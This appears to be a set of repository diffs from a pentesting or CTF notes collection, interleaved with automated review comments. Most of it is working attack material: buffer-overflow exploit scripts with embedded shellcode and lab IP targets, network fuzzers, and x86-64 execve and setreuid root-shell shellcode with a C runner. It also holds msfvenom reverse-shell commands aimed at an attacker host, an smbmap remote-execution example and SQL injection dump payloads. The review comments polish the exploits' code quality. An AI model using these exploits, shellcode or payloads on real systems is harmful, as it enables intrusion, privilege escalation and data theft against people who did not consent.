|
||||||
|
buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda"
|
||||||
|
buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48"
|
||||||
|
buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7"
|
||||||
|
buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70"
|
||||||
|
buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f"
|
||||||
|
buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10"
|
||||||
|
buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7"
|
||||||
|
buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e"
|
||||||
|
buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90"
|
||||||
|
buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1"
|
||||||
|
buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83"
|
||||||
|
buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea"
|
||||||
|
buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b"
|
||||||
|
buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b"
|
||||||
|
buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93"
|
||||||
|
buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c"
|
||||||
|
buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab"
|
||||||
|
buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe"
|
||||||
|
buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8"
|
||||||
|
buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11"
|
||||||
|
buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea"
|
||||||
|
|
||||||
|
|
||||||
|
ip = "10.10.143.77"
|
||||||
|
port = 9999
|
||||||
|
|
||||||
|
|
||||||
|
offset = 2012
|
||||||
|
overflow = b"A" * offset
|
||||||
|
retn = b"\xdf\x14\x50\x62" #"BBBB"
|
||||||
|
padding = b"\x90" * 16
|
||||||
|
payload = buf
|
||||||
|
postfix = b""
|
||||||
|
|
||||||
|
|
||||||
|
buffer = overflow + retn + padding + payload + postfix
|
||||||
|
|
||||||
|
try:
|
||||||
|
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||||
|
s.connect((ip, port))
|
||||||
|
s.recv(2000)
|
||||||
|
s.send(b"pwnbot")
|
||||||
|
s.recv(2000)
|
||||||
|
print("Sending evil buffer...")
|
||||||
|
s.send(buffer)
|
||||||
|
print("Done!")
|
||||||
|
s.close()
|
||||||
|
except socket.error:
|
||||||
|
print("Could not connect: "+socket.error)
|
|
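Review bot: The `except socket.error:` branch at the end concatenates a string with the exception class itself (`"Could not connect: "+socket.error`), which raises `TypeError` and hides the real connection error; bind the exception and format it instead, `except socket.error as e:` / `print("Could not connect: " + str(e))`. `badchars` is built at the top of the file and never read, and `import sys` is unused, so both can be removed. `s.close()` is also skipped whenever one of the `recv`/`send` calls raises, so opening the socket with `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` (or closing in a `finally:`) would release it on every path.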
@ -0,0 +1,54 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
|
||||||
|
ip = "10.10.122.155"
|
||||||
|
port = 31337
|
||||||
|
|
||||||
|
prefix = ""
|
||||||
|
offset = 146
|
||||||
|
overflow = "A" * offset
|
||||||
|
# EIP return
|
||||||
|
#retn = "BBBB"
|
||||||
|
retn = "\xc3\x14\x04\x08"
|
||||||
|
padding = "\x90" * 16
|
||||||
|
#padding = ""
|
||||||
|
#payload = ""
|
||||||
|
payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
|
||||||
|
payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4"
|
||||||
|
payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1"
|
||||||
|
payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44"
|
||||||
|
payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b"
|
||||||
|
payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5"
|
||||||
|
payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c"
|
||||||
|
payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb"
|
||||||
|
payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc"
|
||||||
|
payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b"
|
||||||
|
payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a"
|
||||||
|
payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66"
|
||||||
|
payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a"
|
||||||
|
payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34"
|
||||||
|
payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97"
|
||||||
|
payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a"
|
||||||
|
payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45"
|
||||||
|
payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93"
|
||||||
|
payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66"
|
||||||
|
payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29"
|
||||||
|
payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3"
|
||||||
|
payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb"
|
||||||
|
payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89"
|
||||||
|
payload += "\xef\xd9\x08\x3d\x0f\xc8";
|
||||||
|
|
||||||
|
#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
|
||||||
|
postfix = ""
|
||||||
|
buffer = prefix + overflow + retn + padding + payload + postfix
|
||||||
|
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
try:
|
||||||
|
s.connect((ip, port))
|
||||||
|
print("[*] Sending buffer...")
|
||||||
|
s.send(bytes(buffer + "\r\n", "latin-1"))
|
||||||
|
print("Done!")
|
||||||
|
except:
|
||||||
|
print("Could not connect")
|
|
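Review bot: The bare `except:` around the connect/send block catches everything, including `KeyboardInterrupt`, and reports any failure as `Could not connect` even when it is the `send` that failed; narrow it to `except OSError as e:` and include `e` in the message so the actual error is visible. The socket created by `s = socket.socket(...)` is never closed on either path; `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` closes it automatically. The trailing `;` on the last `payload +=` line is a leftover from another language and can be dropped.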
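--- /dev/null
+++ b/PATH-NOT-SHOWN-11
@@ -0,0 +1,52 @@
+# amd64
+
+* `rax` return value, caller saved.
+* `r10`, `r11` are caller saved.
+* `rbx`, `r12`, `r13`, `r14` are callee saved
+* `rbp` is also callee saved(and can be optionally used as a frame pointer)
+* `rsp` is callee saved
+
+## Function argument registers
+* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved.
+* Further function args are stored inside its stack frame.
+
+
+## Overwriting Variables and Padding
+* Overwrite an atomic variable behind a buffer
+```C
+int main ( int argc, char ** argv ) {
+int var = 0
+char buffer[12];
+
+gets(buffer);
+[...]
+}
+```
+* Stack layout
+```
+Bottom
++------------------+
+| Saved regsisters |
++------------------+
+| int var |
++------------------+
+| char buffer [11] |
+| ... |
+| ... |
+| ... |
+| char buffer [0] |
++------------------+
+| char ** argv |
++------------------+
+| char argc |
++------------------+
+Top
+```
+
+* Watch out! I.e., a 12 byte array is padded to system memory allocation size.
+```
++-------------+----+
+|12 byte array| 4b |
++-------------+----+
+0 12 16 byte
+```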
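--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,66 @@
+# Buffer Overflow
+* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
+
+# Usage
+* Fuzz & crash the binary pretty roughly via payload
+```sh
+python -c "print('A' * 3000)
+```
+
+## Fuzzing
+* python 3
+../fuzzer.py
+
+* python 2
+../fuzzer2.py
+
+## Measure Offset
+* Use as payload
+```sh
+/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
+```
+* Find content of the payload at EIP and identify exact bufferlength
+```sh
+/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
+```
+```
+msf-pattern_offset -l <bufferlength> -q <EIP>
+```
+```
+mona msfpattern -l <bufferlength>
+```
+* Fill offset variable in exploit `buffer_overflow.py`
+../buffer_overflow.py
+
+* Execute buffer_overflow.py, EIP should contain `BBBB`
+
+## Find bad characters to input in the buffer
+* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
+../bad_chars.py
+
+* Compare stack if any bad chars block exectuion of the payload following in the next steps.
+```sh
+!mona bytearray -b "\x00"
+!mona compare -f <path_to_bytearray.bin> -a <ESP>
+```
+
+## Find Jump Point / RoP
+* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
+
+### Example: Immunity Debugger using mona on windows machine
+```sh
+!mona modules
+```
+```sh
+!mona jmp -r esp -m <exploitable_bin_from_modules>
+```
+* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
+
+## Shellcode as Payload
+* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
+```sh
+msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
+msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
+```
+* Prepend NOPs as padding before shellcode
+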
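--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,121 @@
+# Return Address reuse
+
+## via Shellcode, an examples
+* Find out the address of the start of the buffer and the start address of the return address
+* Calculate the difference between these addresses so you know how much data to enter to overflow
+* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
+
+* Plus NOPsled (sometimes xargs is needed in front of the app call)
+```python
+python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow
+```
+
+## Finding Offset
+### via gdb segfault output
+* 64 bit addresses use 6 out of 8 byte for addresses.
+```sh
+gdb ./application
+run $(python -c "print('\x41' * 180)")
+```
+* Return address hit completely when 6 bytes are filled.
+```sh
+Program received signal SIGSEGV, Segmentation fault.
+0x0000414141414141 in copy_arg ()
+```
+* Buffer = measured_length - (`$rbp` + 6 bytes return address)
+
+### via metasploit
+```sh
+/opt/metasploit/tools/exploit/pattern_create.rb -l 180
+```
+* Looking for `rbp` Content in front of the return address to measure offset
+```sh
+(gdb) i r
+[...]
+rbp 0x<rbpAddress> 0x<rbpConent>
+[...]
+```
+* Measure offset
+```sh
+pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
+```
+
+## Crafting Payload
+* Contains Junk/NOPslice + shellcode + Junk over rbp + return address
+* Inside gdb
+```sh
+run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
+```
+* Check actual stack
+```sh
+(gdb) x/100x $rsp-200
+0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
+0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
+0x7fffffffe248: 0xffffe64d 0x00007fff 0x41414141 0x41414141
+0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141
+0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141
+0x7fffffffe278: 0x41414141 0x41414141 0x41414141 0x41414141
+0x7fffffffe288: 0x41414141 0x41414141 0x41414141 0x41414141
+0x7fffffffe298: 0x41414141 0x41414141 0x41414141 0x41414141
+0x7fffffffe2a8: 0x41414141 0x41414141 0x41414141 0x48583b6a
+0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
+[...]
+```
+* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
+## NopSled
+* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
+```sh
+(gdb) x/100x $rsp-200
+0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
+0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
+0x7fffffffe248: 0xffffe64d 0x00007fff 0x90909090 0x90909090
+0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090
+0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090
+0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090
+0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090
+0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090
+0x7fffffffe2a8: 0x90909090 0x90909090 0x90909090 0x48583b6a
+0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
+```
+* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address
+```sh
+run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')")
+```
+
+## setuid() and setreuid()
+* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed.
+* `/bin/sh` checks real uid not effective uid
+* ./shellcodes/setuid_shell.as
+
+### setreuid() in assembler
+* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
+* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002.
+* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`.
+* ./shellcode/setreuid_shell.as
+```sh
+"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05"
+```
+* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm)
+
+### setreuid() in shellcode using pwntools
+* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner.
+```sh
+* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
+shellcraft -f d amd64.linux.setreuid
+```
+* The uid can be set as an argument
+```sh
+shellcraft -f d amd64.linux.setreuid <uid>
+```
+* Prepend this in front of the existing shellcode like this
+```sh
+run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')")
+```
+* Where the existing shellcode is the following
+```sh
+\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
+```
+* Setreuid part is the following
+```sh
+\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05
+```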
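--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,23 @@
+xor rdi,rdi <------ set the rdi to 0
+xor rax,rax
+xor rsi, rsi <------ set the rsi to 0
+mov si, 1002 <------ put the value 1002 in the lower bits of the rsi
+mov di, 1002 <------ put the value 1002 in the lower bits of the rdi
+mov al,0x71 <------ put the setruid function in the al register
+syscall <------ call the function.
+xor rdx,rdx
+movabs rbx,0x68732f6e69622fff
+shr rbx,0x8
+push rbx
+mov rdi,rsp
+xor rax,rax
+push rax
+push rdi
+mov rsi,rsp
+mov al,0x3b
+syscall
+push 0x1
+pop rdi
+push 0x3c
+pop rax
+syscall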
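Review bot: The annotation on `mov al,0x71` says "put the setruid function in the al register", but the value 0x71 is the setreuid number that the notes elsewhere on this page attach to it (`rax` number `\x71`, 113 decimal), so the typo will confuse anyone checking the listing against the syscall table. Suggest `mov al,0x71 <------ syscall number 0x71 (113) = setreuid`. The listing also states nowhere which architecture and assembler syntax it targets; the register names and operand order look like x86-64 Intel syntax, and a first-line comment saying so would make the file self-describing.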
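--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,37 @@
+etuid(0) + execve(/bin/sh) - just 4 fun.
+xi4oyu [at] 80sec.com
+
+main(){
+__asm( "xorq %rdi,%rdi\n\t"
+"mov $0x69,%al\n\t"
+"syscall \n\t"
+"xorq %rdx, %rdx \n\t"
+"movq $0x68732f6e69622fff,%rbx; \n\t"
+"shr $0x8, %rbx; \n\t"
+"push %rbx; \n\t"
+"movq %rsp,%rdi; \n\t"
+"xorq %rax,%rax; \n\t"
+"pushq %rax; \n\t"
+"pushq %rdi; \n\t"
+"movq %rsp,%rsi; \n\t"
+"mov $0x3b,%al; \n\t"
+"syscall ; \n\t"
+"pushq $0x1 ; \n\t"
+"pop %rdi ; \n\t"
+"pushq $0x3c ; \n\t"
+"pop %rax ; \n\t"
+"syscall ; \n\t"
+);
+}
+*/
+main() {
+char shellcode[] =
+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
+"\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
+"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
+"\x58\x0f\x05";
+(*(void (*)()) shellcode)();
+}
+
+2009-05-14
+evil.xi4oyu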
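Review bot: Both `main(){` and `main() {` declare main with an implicit `int` return type, which has not been valid C since C99 and is rejected by current GCC and Clang defaults; `int main(void)` is the portable form. The first line `etuid(0) + execve(/bin/sh) - just 4 fun.` reads as a truncated comment whose `/*` opener is absent while its `*/` closer appears after the inline-asm block, so as rendered the first 26 lines are not a comment at all — worth confirming that the committed file really starts with `/* setuid(0)` rather than the text shown here. The trailing `2009-05-14` and `evil.xi4oyu` lines after the closing brace are likewise bare text and would not compile unless they sit inside a comment.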
@ -0,0 +1,24 @@
#!/usr/bin/env python
import sys, time, socket
ip = "192.168.56.102"
port = 31337
timeout = 5
prefix = ""
counter = 100
string = prefix + "A" * counter
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((ip, port))
print ('[+] Sending buffer')
#s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string + '\r\n', "latin1"))
s.recv(1024)
except:
print ("[!] The program can't be reached")
sys.exit(0)
string += counter * 'A'
time.sleep(1)
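Review bot: `timeout = 5` is assigned but never applied to the socket, so the `s.recv(1024)` after each send can block forever when the service accepts the connection and then goes silent; add `s.settimeout(timeout)` right after the `with socket.socket(...) as s:` line. The bare `except:` then prints "The program can't be reached" for every failure — a `socket.timeout`, a `TypeError` from the encode call, or Ctrl-C — and exits 0, so a real crash cannot be told from a scripting error; narrow it to `except OSError as exc:` and include `exc` in the message. The loop body's indentation is not visible in the rendered hunk, so the nesting of the `with` block under `try:` is assumed here.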
@ -0,0 +1,24 @@
#!/usr/bin/env python2
import sys,socket
import time
address = '192.168.56.102'
port = 9999
buffer = ['A']
counter = 100
while len(buffer) < 10:
buffer.append('A'*counter)
counter=counter+100
try:
for string in buffer:
print '[+] Sending %s bytes...' % len(string)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((address,port))
s.send(string + '\r\n')
s.recv(1024)
print '[+] Done'
except:
print '[!] Unable to connect to the application. You may have crashed it.'
sys.exit(0)
finally:
s.close()
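Review bot: A new socket is created on every iteration of `for string in buffer:` but only the last one is closed by the `finally:` at the end, so each earlier connection stays open until the interpreter exits; move `s.close()` into the loop body (a per-iteration `try`/`finally`) instead. `connect=s.connect((address,port))` stores `None` in a variable that is never read — drop the assignment and call `s.connect((address, port))` directly. The bare `except:` also swallows `KeyboardInterrupt` and `SystemExit` and prints the "You may have crashed it" message for any error at all; `except socket.error as exc:` with the error text in the message would distinguish a real connection failure from a bug in the script. The loop indentation is not visible in the rendered hunk, so the nesting of these statements is assumed.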
@ -0,0 +1,31 @@
#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.161.147"
port = 9999
timeout = 5
prefix = ""
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
s.recv(1024)
s.send("User" '\r\n')
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
s.send(string + '\r\n')
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
print(f"fuzzing with {len(string)} bytes")
except:
#print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
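Review bot: `s.send("User" '\r\n')` and the later `s.send(string + '\r\n')` pass `str` objects to a Python 3 socket, which raises `TypeError: a bytes-like object is required`; because the bare `except:` that follows ends in `sys.exit(0)`, the script stops silently on the first iteration without having sent a single fuzz case. Use `s.send(b"User\r\n")` and `s.send(bytes(string + "\r\n", "latin-1"))`, and narrow the handler to `except OSError as exc:` with the error printed so a genuine connection failure is reported rather than hidden. The earlier `s.send(bytes(string, "latin-1"))` followed by a second send of the same string looks like a leftover from editing; one of the two is probably unintended. The loop indentation is not visible in the rendered hunk, so the nesting of these statements under `try:` is assumed.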
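--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1 @@
+Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43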
@ -0,0 +1,8 @@
import pwn
r = pwn.remote("10.10.156.228", 9999)
r.recvuntil(":")
r.send("User\r\n")
r.recvuntil(":")
r.send(b'A' * 2200)
r.recvuntil("message:")
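Review bot: The script mixes text and bytes on the same tube: `r.recvuntil(":")`, `r.send("User\r\n")` and `r.recvuntil("message:")` pass `str` while `r.send(b'A' * 2200)` passes bytes, and on Python 3 pwntools the `str` calls only work through implicit encoding and may raise a `BytesWarning`. Use bytes literals throughout — `r.recvuntil(b":")`, `r.send(b"User\r\n")`, `r.recvuntil(b"message:")`. The host and port are hard-coded in the call to `pwn.remote(...)`; taking them from `sys.argv` would keep a lab address out of the committed file and make the script reusable.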
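--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,3 @@
+# Pwntools
+
+* [Docs](https://docs.pwntools.com/en/stable/)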
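--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,4 @@
+# Scapy
+
+* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html)
+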
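--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1 @@
+Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003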
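--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,12 @@
+# smbmap
+
+* [Repo](https://github.com/ShawnDEvans/smbmap.git)
+* `python3 -m pip install -r requirements.txt`
+
+# Usage
+* `-x` execute command on server
+* `-s` enumerate share
+
+```sh
+smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
+```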
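--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,86 @@
+# SQL Injection
+
+# Finding an Opportunity
+* GET parameter
+```sh
+http://example.com/index.php?id=' or 1=1 -- -
+```
+* Provoke error to gain information
+```sh
+http://example.com/index.php?id='
+```
+
+# Usage
+
+* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
+```sql
+SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
+SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
+```
+
+* Boolean True and False
+```sql
+SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
+SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
+```
+
+* Blind injection // Guessing characters
+```sh
+http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
+```
+
+### Union based
+* Check number of cols
+```sql
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
+' UNION SELECT NULL,NULL,NULL--
+# until the error occurs
+```
+* Check which one is a string
+```sql
+' UNION SELECT 'a',NULL,NULL,NULL--
+' UNION SELECT NULL,'a',NULL,NULL--
+' UNION SELECT NULL,NULL,'a',NULL--
+' UNION SELECT NULL,NULL,NULL,'a'--
+```
+* Retrieve content, for cols and comment two times as an example. Or dump database
+```sql
+' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
+' UNION SELECT NULL,username,password,NULL FROM users -- //
+```
+
+* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
+
+## Tools
+### SQLmap
+* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
+* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
+* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
+* Use `-r` with a saved HTTP request
+```sh
+sqlmap -r request.txt --dbms=mysql --dump
+sqlmap -r request.txt --batch
+```
+
+
+|Parameter|Details|
+|-r|Uses the intercepted request save as a file|
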